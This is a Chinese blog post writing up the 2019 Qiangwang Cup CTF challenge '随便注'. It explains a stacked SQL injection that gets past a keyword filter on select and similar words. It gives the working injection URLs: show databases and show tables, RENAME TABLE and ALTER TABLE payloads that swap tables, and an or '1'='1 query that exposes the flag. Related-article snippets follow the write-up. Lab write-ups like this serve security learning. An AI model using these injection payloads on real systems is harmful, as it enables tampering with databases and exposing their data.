[强网杯 2019]随便注wp

最新推荐文章于 2023-09-08 19:12:47 发布
最新推荐文章于 2023-09-08 19:12:47 发布
阅读量238 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vegetable223/article/details/110285519
版权

强网杯2019随便注

一看题目就知道这是sql注入,只听过没学过,看来这题只能全程跟着大神的思路走了。

1.打开靶机,随便提交,发现似乎是把 PHP 查询的原始结果之间返回了

2.输入 select 发现了过滤语句,过滤了 select,update,delete,drop,insert,where 和 .

return  preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

测试一下有没有注入。?inject=1’%23,返回正常,字符型注入

过滤了这么多关键词,尝试堆叠注入。?inject=1’;show databases;%23,看到了所有的数据库,没有看到flag字眼
在这里插入图片描述
5.再看一下所有的表。?inject=1’;show tables;%23,1919810931114514 表和 words 表,flag可能在这两个表里面
在这里插入图片描述
6.发现flag 在全数字的表里,默认查询的是 words 表

 ?inject=1';show columns from `1919810931114514`;%23
 ?inject=1';show columns from `words`;%23

数字表中的数据:
在这里插入图片描述

words表里的数据:
在这里插入图片描述

7.既然没过滤 alert 和 rename,那就可以把表和列改名。先把 words 改为 words1(随便改),再把数字表改为 words,然后把新的 words 表里的 flag 列改为 id ,这样就可以直接查询 flag 了

8.构造 payload 如下

/?inject=1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;%23

9.使用 /?inject=1' or '1'='1 访问一下即可获得 flag

重点知识:

1.MySQL 的 show、rename 和 alter 命令 show 可以用于查看当前数据库,当前表,以及表中的字段 rename 用于修改 table 的名称 alter 用于修改表中字段的属性

2.攻击思路:默认查询 words 表,可以将数字表的名称改成 words,这样就可以 使用 or ‘1’='1 直接查询 flag 了

vegetable223
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-Web-随便-wp
single7_的博客
12-14 367
0x01 知识点 SQL入-堆叠入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种入方式称为堆叠入。 union injection(联合入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1345
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
[强网杯 2019]随便 wp
weixin_73560599的博客
09-08 73
堆叠入 handler 拼接
BUUCTF&[强网杯 2019]随便(细节详解WP)
Pysnow's Blog
12-09 4227
这道题通过大佬的讲解,终于把其中一些细节操作的原理给理解了一遍,我们看别人的题解,跟要知道这个题解中每一操作的原理,这对我们的提升有非常的作业
[强网杯 2019]随便 (学习)记录
qq_63548648的博客
12-06 217
1
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2553
以buuctf的强网杯2019为例的堆叠
[强网杯 2019]Upload wp
qq_41891666的博客
07-16 1573
0x00 前言 本来是在刷 文件上传的题,然后没想到强网杯这个题打着upload 的幌子其实是个反序列化题,看了看wp 后,觉得很有意思,值得记录一下 0x01 题解 1.首先用户登录后的 cookie 是一串加密的内容,很可疑,base64 解密之后,发现是序列化的内容 2.dirmap 扫目录,扫到源码,/www.tar.gz 下载之后发现里面包含源码,以及.idea 文件,phpstorm 打开发现断点,估计是出题人故意留的提示 3.审计源码 先看两个断点处: login_check() 函数
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
掘安杯wp分析文件
04-10
根据官方wp复现 和自己参赛记录整理记录的IDA分析文件
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 wp 解题思路
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 WP 解题思路 本资源为2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题的 WP 解题思路,涵盖了四个题目,分别为蓝01-取证、蓝02-取证、蓝03-取证...
[强网杯 2019]随便
m0_56691564的博客
11-30 2700
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
强网杯 2019]随便
qq_53689523的博客
02-17 155
强网杯2019随便;堆叠入,禁select;sql入,sqlmap
过滤select|update|delete|drop|insert|where的入 [ 强网杯 2019]随便
lonmar的博客
04-08 4709
转载于 攻防世界WP https://adworld.xctf.org.cn/task/writeup?type=web&id=5417&number=3&grade=1&page=1 题目链接https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=541...
攻防世界-Web高手进阶区-supersqli(强网杯随便)
feng的博客
09-14 1595
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WPWP 首先进入环境,发现是SQL入。我们先简单的进行一些测试,发现是字符型入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union入的时候出现: return preg_match("/select|update|delete|drop|insert|
DBO-CNN-BiLSTM-Attention蜣螂算法优化多变量时间序列预测,含优化前后对比(Matlab完整源码和数据)
最新发布
08-17
1.Matlab实现DBO蜣螂算法优化CNN-BiLSTM-Attention多变量时间序列预测,含优化前后对比(Matlab完整源码和数据)优化学习率,神经元个数,意力机制的键值, 正则化参数。 2.输出MAE 、 MAPE、MSE、RMSE、R2多指标评价,运行环境Matlab2023及以上。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:机器学习之心,博客专家认证,机器学习领域创作者,2023博客之星TOP50,主做机器学习和深度学习时序、回归、分类、聚类和降维等程序设计和案例分析,文章底部有博主联系方式。从事Matlab、Python算法仿真工作8年,更多仿真源码、数据集定制私信.
强网杯 2022 谍影重重wp
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值